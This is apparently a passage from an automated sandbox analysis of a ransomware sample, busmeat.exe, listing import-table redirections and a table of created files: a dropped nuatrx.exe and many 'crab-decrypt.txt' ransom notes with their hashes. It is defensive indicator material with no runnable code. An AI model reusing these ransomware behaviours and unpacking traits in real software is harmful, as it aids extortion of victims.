IAT private_0x0000000000d00000:+0x19a8c 20. entry of busmeat.exe 4 bytes kernel32.dll:GetConsoleCP+0x0 now points to pagefile_0x0000000000010000:+0x282a
IAT private_0x0000000000d00000:+0x19370 20. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x282a now points to kernel32.dll:SetFilePointerEx+0x0
IAT private_0x0000000000d00000:+0x19a8c 21. entry of busmeat.exe 4 bytes kernel32.dll:SetConsoleOutputCP+0x0 now points to pagefile_0x0000000000010000:+0x2330
IAT private_0x0000000000d00000:+0x19370 21. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x2330 now points to kernel32.dll:VirtualProtect+0x0
IAT private_0x0000000000d00000:+0x19a8c 22. entry of busmeat.exe 4 bytes kernel32.dll:CloseHandle+0x0 now points to pagefile_0x0000000000010000:+0x23e4
IAT private_0x0000000000d00000:+0x19370 22. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x23e4 now points to kernel32.dll:IsWow64Process+0x0
IAT private_0x0000000000d00000:+0x19a8c 23. entry of busmeat.exe 4 bytes kernel32.dll:WriteConsoleW+0x0 now points to pagefile_0x0000000000010000:+0x281a
IAT private_0x0000000000d00000:+0x19370 23. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x281a now points to kernel32.dll:SetStdHandle+0x0
IAT private_0x0000000000d00000:+0x19a8c 24. entry of busmeat.exe 4 bytes kernel32.dll:SetFilePointerEx+0x0 now points to pagefile_0x0000000000010000:+0x2808
IAT private_0x0000000000d00000:+0x19370 24. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x2808 now points to kernel32.dll:GetConsoleMode+0x0
IAT private_0x0000000000d00000:+0x19a8c 25. entry of busmeat.exe 4 bytes kernel32.dll:SetStdHandle+0x0 now points to pagefile_0x0000000000010000:+0x27f8
IAT private_0x0000000000d00000:+0x19370 25. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x27f8 now points to kernel32.dll:GetConsoleCP+0x0
IAT private_0x0000000000d00000:+0x19a8c 26. entry of busmeat.exe 4 bytes kernel32.dll:GetConsoleMode+0x0 now points to pagefile_0x0000000000010000:+0x27e4
IAT private_0x0000000000d00000:+0x19370 26. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x27e4 now points to kernel32.dll:FlushFileBuffers+0x0
IAT private_0x0000000000d00000:+0x19a8c 27. entry of busmeat.exe 4 bytes kernel32.dll:GetStringTypeW+0x0 now points to pagefile_0x0000000000010000:+0x249a
IAT private_0x0000000000d00000:+0x19370 27. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x249a now points to kernel32.dll:GetCommandLineA+0x0
IAT private_0x0000000000d00000:+0x19a8c 28. entry of busmeat.exe 4 bytes kernel32.dll:LocalFileTimeToFileTime+0x0 now points to pagefile_0x0000000000010000:+0x24ac
IAT private_0x0000000000d00000:+0x19370 28. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x24ac now points to kernel32.dll:SetLastError+0x0
IAT private_0x0000000000d00000:+0x19a8c 29. entry of busmeat.exe 4 bytes kernel32.dll:SetFileShortNameW+0x0 now points to pagefile_0x0000000000010000:+0x24bc
IAT private_0x0000000000d00000:+0x19370 29. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x24bc now points to kernel32.dll:GetCurrentThreadId+0x0
IAT private_0x0000000000d00000:+0x19a8c 30. entry of busmeat.exe 4 bytes kernel32.dll:FlushFileBuffers+0x0 now points to pagefile_0x0000000000010000:+0x24d2
IAT private_0x0000000000d00000:+0x19370 30. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x24d2 now points to ntdll.dll:RtlEncodePointer+0x0
IAT private_0x0000000000d00000:+0x19a8c 31. entry of busmeat.exe 4 bytes kernel32.dll:GetThreadContext+0x0 now points to pagefile_0x0000000000010000:+0x24e2
IAT private_0x0000000000d00000:+0x19370 31. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x24e2 now points to ntdll.dll:RtlDecodePointer+0x0
IAT private_0x0000000000d00000:+0x19a8c 32. entry of busmeat.exe 4 bytes kernel32.dll:GetLastError+0x0 now points to pagefile_0x0000000000010000:+0x24f2
IAT private_0x0000000000d00000:+0x19370 32. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x24f2 now points to kernel32.dll:GetModuleHandleExW+0x0
IAT private_0x0000000000d00000:+0x19a8c 33. entry of busmeat.exe 4 bytes kernel32.dll:VirtualProtect+0x0 now points to pagefile_0x0000000000010000:+0x2508
IAT private_0x0000000000d00000:+0x19370 33. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x2508 now points to kernel32.dll:MultiByteToWideChar+0x0
IAT private_0x0000000000d00000:+0x19a8c 34. entry of busmeat.exe 4 bytes kernel32.dll:IsDBCSLeadByteEx+0x0 now points to pagefile_0x0000000000010000:+0x251e
IAT private_0x0000000000d00000:+0x19370 34. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x251e now points to kernel32.dll:WideCharToMultiByte+0x0
IAT private_0x0000000000d00000:+0x19a8c 35. entry of busmeat.exe 4 bytes kernel32.dll:LocalAlloc+0x0 now points to pagefile_0x0000000000010000:+0x2534
IAT private_0x0000000000d00000:+0x19370 35. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x2534 now points to kernel32.dll:GetProcessHeap+0x0
IAT private_0x0000000000d00000:+0x19a8c 36. entry of busmeat.exe 4 bytes kernel32.dll:OutputDebugStringW+0x0 now points to pagefile_0x0000000000010000:+0x2546
IAT private_0x0000000000d00000:+0x19370 36. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x2546 now points to kernel32.dll:GetStdHandle+0x0
IAT private_0x0000000000d00000:+0x19a8c 37. entry of busmeat.exe 4 bytes ntdll.dll:RtlReAllocateHeap+0x0 now points to pagefile_0x0000000000010000:+0x2556
IAT private_0x0000000000d00000:+0x19370 37. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x2556 now points to kernel32.dll:GetFileType+0x0
IAT private_0x0000000000d00000:+0x19a8c 38. entry of busmeat.exe 4 bytes ntdll.dll:RtlEncodePointer+0x0 now points to pagefile_0x0000000000010000:+0x2564
IAT private_0x0000000000d00000:+0x19370 38. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x2564 now points to ntdll.dll:RtlDeleteCriticalSection+0x0
IAT private_0x0000000000d00000:+0x19a8c 39. entry of busmeat.exe 4 bytes ntdll.dll:RtlDecodePointer+0x0 now points to pagefile_0x0000000000010000:+0x257c
IAT private_0x0000000000d00000:+0x19370 39. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x257c now points to kernel32.dll:GetStartupInfoW+0x0
IAT private_0x0000000000d00000:+0x19a8c 40. entry of busmeat.exe 4 bytes kernel32.dll:RaiseException+0x0 now points to pagefile_0x0000000000010000:+0x258e
IAT private_0x0000000000d00000:+0x19370 40. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x258e now points to kernel32.dll:GetModuleFileNameA+0x0
IAT private_0x0000000000d00000:+0x19a8c 41. entry of busmeat.exe 4 bytes kernel32.dll:RtlUnwind+0x0 now points to pagefile_0x0000000000010000:+0x25a4
IAT private_0x0000000000d00000:+0x19370 41. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x25a4 now points to kernel32.dll:WriteFile+0x0
IAT private_0x0000000000d00000:+0x19a8c 42. entry of busmeat.exe 4 bytes kernel32.dll:GetCommandLineA+0x0 now points to pagefile_0x0000000000010000:+0x25b0
IAT private_0x0000000000d00000:+0x19370 42. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x25b0 now points to kernel32.dll:QueryPerformanceCounter+0x0
IAT private_0x0000000000d00000:+0x19a8c 43. entry of busmeat.exe 4 bytes kernel32.dll:IsProcessorFeaturePresent+0x0 now points to pagefile_0x0000000000010000:+0x25ca
IAT private_0x0000000000d00000:+0x19370 43. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x25ca now points to kernel32.dll:GetSystemTimeAsFileTime+0x0
IAT private_0x0000000000d00000:+0x19a8c 44. entry of busmeat.exe 4 bytes ntdll.dll:RtlAllocateHeap+0x0 now points to pagefile_0x0000000000010000:+0x25e4
IAT private_0x0000000000d00000:+0x19370 44. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x25e4 now points to kernel32.dll:GetEnvironmentStringsW+0x0
IAT private_0x0000000000d00000:+0x19a8c 45. entry of busmeat.exe 4 bytes kernel32.dll:HeapFree+0x0 now points to pagefile_0x0000000000010000:+0x25fe
IAT private_0x0000000000d00000:+0x19370 45. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x25fe now points to kernel32.dll:FreeEnvironmentStringsW+0x0
IAT private_0x0000000000d00000:+0x19a8c 46. entry of busmeat.exe 4 bytes kernel32.dll:ExitProcess+0x0 now points to pagefile_0x0000000000010000:+0x2618
IAT private_0x0000000000d00000:+0x19370 46. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x2618 now points to kernel32.dll:IsDebuggerPresent+0x0
IAT private_0x0000000000d00000:+0x19a8c 47. entry of busmeat.exe 4 bytes kernel32.dll:GetModuleHandleExW+0x0 now points to pagefile_0x0000000000010000:+0x262c
IAT private_0x0000000000d00000:+0x19370 47. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x262c now points to kernel32.dll:IsProcessorFeaturePresent+0x0
IAT private_0x0000000000d00000:+0x19a8c 48. entry of busmeat.exe 4 bytes kernel32.dll:GetProcAddress+0x0 now points to pagefile_0x0000000000010000:+0x2648
IAT private_0x0000000000d00000:+0x19370 48. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x2648 now points to kernel32.dll:UnhandledExceptionFilter+0x0
IAT private_0x0000000000d00000:+0x19a8c 49. entry of busmeat.exe 4 bytes kernel32.dll:MultiByteToWideChar+0x0 now points to pagefile_0x0000000000010000:+0x2664
IAT private_0x0000000000d00000:+0x19370 49. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x2664 now points to kernel32.dll:SetUnhandledExceptionFilter+0x0
IAT private_0x0000000000d00000:+0x19a8c 50. entry of busmeat.exe 4 bytes kernel32.dll:WideCharToMultiByte+0x0 now points to pagefile_0x0000000000010000:+0x2682
IAT private_0x0000000000d00000:+0x19370 50. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x2682 now points to kernel32.dll:InitializeCriticalSectionAndSpinCount+0x0
IAT private_0x0000000000d00000:+0x19a8c 51. entry of busmeat.exe 4 bytes ntdll.dll:RtlSizeHeap+0x0 now points to pagefile_0x0000000000010000:+0x26aa
IAT private_0x0000000000d00000:+0x19370 51. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x26aa now points to kernel32.dll:TerminateProcess+0x0
IAT private_0x0000000000d00000:+0x19a8c 52. entry of busmeat.exe 4 bytes kernel32.dll:SetLastError+0x0 now points to pagefile_0x0000000000010000:+0x26be
IAT private_0x0000000000d00000:+0x19370 52. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x26be now points to kernel32.dll:TlsAlloc+0x0
IAT private_0x0000000000d00000:+0x19a8c 53. entry of busmeat.exe 4 bytes kernel32.dll:GetCurrentThreadId+0x0 now points to pagefile_0x0000000000010000:+0x26ca
IAT private_0x0000000000d00000:+0x19370 53. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x26ca now points to kernel32.dll:TlsGetValue+0x0
IAT private_0x0000000000d00000:+0x19a8c 54. entry of busmeat.exe 4 bytes kernel32.dll:GetProcessHeap+0x0 now points to pagefile_0x0000000000010000:+0x26d8
IAT private_0x0000000000d00000:+0x19370 54. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x26d8 now points to kernel32.dll:TlsSetValue+0x0
IAT private_0x0000000000d00000:+0x19a8c 55. entry of busmeat.exe 4 bytes kernel32.dll:GetStdHandle+0x0 now points to pagefile_0x0000000000010000:+0x26e6
IAT private_0x0000000000d00000:+0x19370 55. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x26e6 now points to kernel32.dll:TlsFree+0x0
IAT private_0x0000000000d00000:+0x19a8c 56. entry of busmeat.exe 4 bytes kernel32.dll:GetFileType+0x0 now points to pagefile_0x0000000000010000:+0x26f0
IAT private_0x0000000000d00000:+0x19370 56. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x26f0 now points to kernel32.dll:GetModuleHandleW+0x0
IAT private_0x0000000000d00000:+0x19a8c 57. entry of busmeat.exe 4 bytes ntdll.dll:RtlDeleteCriticalSection+0x0 now points to pagefile_0x0000000000010000:+0x2704
IAT private_0x0000000000d00000:+0x19370 57. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x2704 now points to ntdll.dll:RtlEnterCriticalSection+0x0
IAT private_0x0000000000d00000:+0x19a8c 58. entry of busmeat.exe 4 bytes kernel32.dll:GetStartupInfoW+0x0 now points to pagefile_0x0000000000010000:+0x271c
IAT private_0x0000000000d00000:+0x19370 58. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x271c now points to ntdll.dll:RtlLeaveCriticalSection+0x0
IAT private_0x0000000000d00000:+0x19a8c 59. entry of busmeat.exe 4 bytes kernel32.dll:GetModuleFileNameA+0x0 now points to pagefile_0x0000000000010000:+0x2734
IAT private_0x0000000000d00000:+0x19370 59. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x2734 now points to kernel32.dll:HeapFree+0x0
IAT private_0x0000000000d00000:+0x19a8c 60. entry of busmeat.exe 4 bytes kernel32.dll:WriteFile+0x0 now points to pagefile_0x0000000000010000:+0x2740
IAT private_0x0000000000d00000:+0x19370 60. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x2740 now points to kernel32.dll:IsValidCodePage+0x0
IAT private_0x0000000000d00000:+0x19a8c 61. entry of busmeat.exe 4 bytes kernel32.dll:QueryPerformanceCounter+0x0 now points to pagefile_0x0000000000010000:+0x2752
IAT private_0x0000000000d00000:+0x19370 61. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x2752 now points to kernel32.dll:GetACP+0x0
IAT private_0x0000000000d00000:+0x19a8c 62. entry of busmeat.exe 4 bytes kernel32.dll:GetCurrentProcessId+0x0 now points to pagefile_0x0000000000010000:+0x275c
IAT private_0x0000000000d00000:+0x19370 62. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x275c now points to kernel32.dll:GetOEMCP+0x0
IAT private_0x0000000000d00000:+0x19a8c 63. entry of busmeat.exe 4 bytes kernel32.dll:GetSystemTimeAsFileTime+0x0 now points to pagefile_0x0000000000010000:+0x2768
IAT private_0x0000000000d00000:+0x19370 63. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x2768 now points to kernel32.dll:GetCPInfo+0x0
IAT private_0x0000000000d00000:+0x19a8c 64. entry of busmeat.exe 4 bytes kernel32.dll:GetEnvironmentStringsW+0x0 now points to pagefile_0x0000000000010000:+0x2774
IAT private_0x0000000000d00000:+0x19370 64. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x2774 now points to kernel32.dll:LoadLibraryExW+0x0
IAT private_0x0000000000d00000:+0x19a8c 65. entry of busmeat.exe 4 bytes kernel32.dll:FreeEnvironmentStringsW+0x0 now points to pagefile_0x0000000000010000:+0x2786
IAT private_0x0000000000d00000:+0x19370 65. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x2786 now points to kernel32.dll:OutputDebugStringW+0x0
IAT private_0x0000000000d00000:+0x19a8c 66. entry of busmeat.exe 4 bytes kernel32.dll:UnhandledExceptionFilter+0x0 now points to pagefile_0x0000000000010000:+0x279c
IAT private_0x0000000000d00000:+0x19370 66. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x279c now points to ntdll.dll:RtlAllocateHeap+0x0
IAT private_0x0000000000d00000:+0x19a8c 67. entry of busmeat.exe 4 bytes kernel32.dll:SetUnhandledExceptionFilter+0x0 now points to pagefile_0x0000000000010000:+0x27a8
IAT private_0x0000000000d00000:+0x19370 67. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x27a8 now points to ntdll.dll:RtlReAllocateHeap+0x0
IAT private_0x0000000000d00000:+0x19a8c 68. entry of busmeat.exe 4 bytes kernel32.dll:InitializeCriticalSectionAndSpinCount+0x0 now points to pagefile_0x0000000000010000:+0x27b6
IAT private_0x0000000000d00000:+0x19370 68. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x27b6 now points to kernel32.dll:GetStringTypeW+0x0
IAT private_0x0000000000d00000:+0x19a8c 69. entry of busmeat.exe 4 bytes kernel32.dll:Sleep+0x0 now points to pagefile_0x0000000000010000:+0x27c8
IAT private_0x0000000000d00000:+0x19370 69. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x27c8 now points to ntdll.dll:RtlSizeHeap+0x0
IAT private_0x0000000000d00000:+0x19a8c 70. entry of busmeat.exe 4 bytes kernel32.dll:GetCurrentProcess+0x0 now points to pagefile_0x0000000000010000:+0x27d4
IAT private_0x0000000000d00000:+0x19370 70. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x27d4 now points to kernel32.dll:LCMapStringW+0x0
IAT private_0x0000000000d00000:+0x19a8c 72. entry of busmeat.exe 4 bytes kernel32.dll:TlsAlloc+0x0 now points to pagefile_0x0000000000010000:+0x29b2
IAT private_0x0000000000d00000:+0x19370 72. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x29b2 now points to user32.dll:SetFocus+0x0
IAT private_0x0000000000d00000:+0x19a8c 73. entry of busmeat.exe 4 bytes kernel32.dll:TlsSetValue+0x0 now points to pagefile_0x0000000000010000:+0x28d2
IAT private_0x0000000000d00000:+0x19370 73. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x28d2 now points to user32.dll:SendMessageW+0x0
IAT private_0x0000000000d00000:+0x19a8c 74. entry of busmeat.exe 4 bytes kernel32.dll:TlsFree+0x0 now points to pagefile_0x0000000000010000:+0x2466
IAT private_0x0000000000d00000:+0x19370 74. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x2466 now points to user32.dll:CharUpperBuffW+0x0
IAT private_0x0000000000d00000:+0x19a8c 75. entry of busmeat.exe 4 bytes kernel32.dll:GetModuleHandleW+0x0 now points to pagefile_0x0000000000010000:+0x2450
IAT private_0x0000000000d00000:+0x19370 75. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x2450 now points to user32.dll:GetForegroundWindow+0x0
IAT private_0x0000000000d00000:+0x19a8c 76. entry of busmeat.exe 4 bytes kernel32.dll:IsDebuggerPresent+0x0 now points to pagefile_0x0000000000010000:+0x243c
IAT private_0x0000000000d00000:+0x19370 76. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x243c now points to user32.dll:GetSystemMetrics+0x0
IAT private_0x0000000000d00000:+0x19a8c 77. entry of busmeat.exe 4 bytes kernel32.dll:LCMapStringW+0x0 now points to pagefile_0x0000000000010000:+0x289c
IAT private_0x0000000000d00000:+0x19370 77. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x289c now points to user32.dll:GetMessageW+0x0
IAT private_0x0000000000d00000:+0x19a8c 78. entry of busmeat.exe 4 bytes ntdll.dll:RtlEnterCriticalSection+0x0 now points to pagefile_0x0000000000010000:+0x28aa
IAT private_0x0000000000d00000:+0x19370 78. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x28aa now points to user32.dll:TranslateMessage+0x0
IAT private_0x0000000000d00000:+0x19a8c 79. entry of busmeat.exe 4 bytes ntdll.dll:RtlLeaveCriticalSection+0x0 now points to pagefile_0x0000000000010000:+0x28be
IAT private_0x0000000000d00000:+0x19370 79. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x28be now points to user32.dll:DispatchMessageW+0x0
IAT private_0x0000000000d00000:+0x19a8c 80. entry of busmeat.exe 4 bytes kernel32.dll:LoadLibraryExW+0x0 now points to pagefile_0x0000000000010000:+0x29be
IAT private_0x0000000000d00000:+0x19370 80. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x29be now points to user32.dll:SetForegroundWindow+0x0
IAT private_0x0000000000d00000:+0x19a8c 81. entry of busmeat.exe 4 bytes kernel32.dll:IsValidCodePage+0x0 now points to pagefile_0x0000000000010000:+0x28e2
IAT private_0x0000000000d00000:+0x19370 81. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x28e2 now points to ntdll.dll:NtdllDefWindowProc_W+0x0
IAT private_0x0000000000d00000:+0x19a8c 82. entry of busmeat.exe 4 bytes kernel32.dll:GetACP+0x0 now points to pagefile_0x0000000000010000:+0x28f4
IAT private_0x0000000000d00000:+0x19370 82. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x28f4 now points to user32.dll:RegisterClassExW+0x0
IAT private_0x0000000000d00000:+0x19a8c 83. entry of busmeat.exe 4 bytes kernel32.dll:GetOEMCP+0x0 now points to pagefile_0x0000000000010000:+0x2908
IAT private_0x0000000000d00000:+0x19370 83. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x2908 now points to user32.dll:CreateWindowExW+0x0
IAT private_0x0000000000d00000:+0x19a8c 84. entry of busmeat.exe 4 bytes kernel32.dll:GetCPInfo+0x0 now points to pagefile_0x0000000000010000:+0x291a
IAT private_0x0000000000d00000:+0x19370 84. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x291a now points to user32.dll:DestroyWindow+0x0
IAT private_0x0000000000d00000:+0x19a8c 85. entry of busmeat.exe 4 bytes kernel32.dll:CreateFileW+0x0 now points to pagefile_0x0000000000010000:+0x292a
IAT private_0x0000000000d00000:+0x19370 85. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x292a now points to user32.dll:ShowWindow+0x0
IAT private_0x0000000000d00000:+0x19370 86. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x2938 now points to user32.dll:keybd_event+0x0
IAT private_0x0000000000d00000:+0x19a8c 87. entry of busmeat.exe 4 bytes user32.dll:LoadAcceleratorsW+0x0 now points to pagefile_0x0000000000010000:+0x2946
IAT private_0x0000000000d00000:+0x19370 87. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x2946 now points to user32.dll:UpdateWindow+0x0
IAT private_0x0000000000d00000:+0x19a8c 88. entry of busmeat.exe 4 bytes user32.dll:RemovePropA+0x0 now points to pagefile_0x0000000000010000:+0x2956
IAT private_0x0000000000d00000:+0x19370 88. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x2956 now points to user32.dll:SetWindowTextW+0x0
IAT private_0x0000000000d00000:+0x19a8c 89. entry of busmeat.exe 4 bytes user32.dll:GetPropA+0x0 now points to pagefile_0x0000000000010000:+0x2968
IAT private_0x0000000000d00000:+0x19370 89. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x2968 now points to user32.dll:GetWindowLongW+0x0
IAT private_0x0000000000d00000:+0x19a8c 90. entry of busmeat.exe 4 bytes user32.dll:AppendMenuA+0x0 now points to pagefile_0x0000000000010000:+0x297a
IAT private_0x0000000000d00000:+0x19370 90. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x297a now points to user32.dll:SetWindowLongW+0x0
IAT private_0x0000000000d00000:+0x19a8c 91. entry of busmeat.exe 4 bytes user32.dll:HiliteMenuItem+0x0 now points to pagefile_0x0000000000010000:+0x298c
IAT private_0x0000000000d00000:+0x19370 91. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x298c now points to user32.dll:SystemParametersInfoW+0x0
IAT private_0x0000000000d00000:+0x19370 92. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x29a4 now points to user32.dll:GetAncestor+0x0
IAT private_0x0000000000d00000:+0x19370 94. entry of busmeat.exe 4 bytes pagefile_0x0000000000010000:+0x2484 now points to ntdll.dll:RtlUnwind+0x0
Created Files
»
Filename File Size Hash Values YARA Match Actions
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\nuatrx.exe 231.51 KB MD5: 59565c950f30350b34a374da0595b267
SHA1: c9acbcf7ff4758fa4d3534fe9158540b64a1cd4a
SHA256: 3c7ecfccf72e83f5d9426cf456d567c3a0a9586876a19ecb11e7b14b7d58e0e0
False
c:\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082
False
c:\$recycle.bin\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082
False
c:\$recycle.bin\s-1-5-18\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082
False
c:\$recycle.bin\s-1-5-21-1462094071-1423818996-289466292-1000\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082
False
c:\users\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082
False
c:\perflogs\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082
False
c:\program files\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082
False
c:\program files (x86)\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082
False
c:\recovery\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082
False
c:\recovery\windowsre\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082
False
c:\system volume information\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082
False
c:\users\ciihmnxmn6ps\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082
False
c:\users\ciihmnxmn6ps\appdata\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082
False
c:\users\ciihmnxmn6ps\appdata\roaming\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082
False
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082
False
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\acrobat\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082
False
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\acrobat\dc\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082
False
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\acrobat\dc\collab\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082
False
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\acrobat\dc\forms\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
